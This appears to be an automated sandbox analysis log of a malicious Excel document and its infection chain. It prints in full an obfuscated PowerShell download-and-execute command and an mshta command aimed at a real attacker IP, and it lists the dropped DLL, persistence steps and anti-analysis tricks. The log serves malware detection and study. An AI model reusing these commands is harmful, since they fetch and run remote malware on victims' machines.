Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",ZIMElQfgS
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",zrvqzkK
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",vtyiOTNVC
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",ZIMElQfgS Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",zrvqzkK Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",vtyiOTNVC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",DllRegisterServer Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD142.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002A5988 CreateToolhelp32Snapshot, 17_2_002A5988
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: >ystem.pdbT source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: 32E3.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation
barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\mshta.exe Code function: 4_3_031E08CF push 8B4902A5h; iretd 4_3_031E08D4
Source: C:\Windows\System32\mshta.exe Code function: 4_3_031E00BB push 8B4902A5h; iretd 4_3_031E00C1
Source: C:\Windows\System32\mshta.exe Code function: 4_3_031E08CF push 8B4902A5h; iretd 4_3_031E08D4
Source: C:\Windows\System32\mshta.exe Code function: 4_3_031E00BB push 8B4902A5h; iretd 4_3_031E00C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
PE file contains an invalid checksum
Source: JooSee.dll.6.dr Static PE information: real checksum: 0x8df98 should be: 0x8e522

Persistence and Installation Behavior
barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Drops PE files
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv (copy) Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 1992 Thread sleep time: -360000s >= -30000s Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: rundll32.exe, 0000000A.00000002.529168355.000000000045A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: rundll32.exe, 0000000F.00000002.608665312.00000000004CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002A7E00 FindFirstFileW, 17_2_002A7E00
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00384087 mov eax, dword ptr fs:[00000030h] 9_2_00384087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00384087 mov eax, dword ptr fs:[00000030h] 10_2_00384087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00284087 mov eax, dword ptr fs:[00000030h] 11_2_00284087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00194087 mov eax, dword ptr fs:[00000030h] 12_2_00194087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00264087 mov eax, dword ptr fs:[00000030h] 14_2_00264087
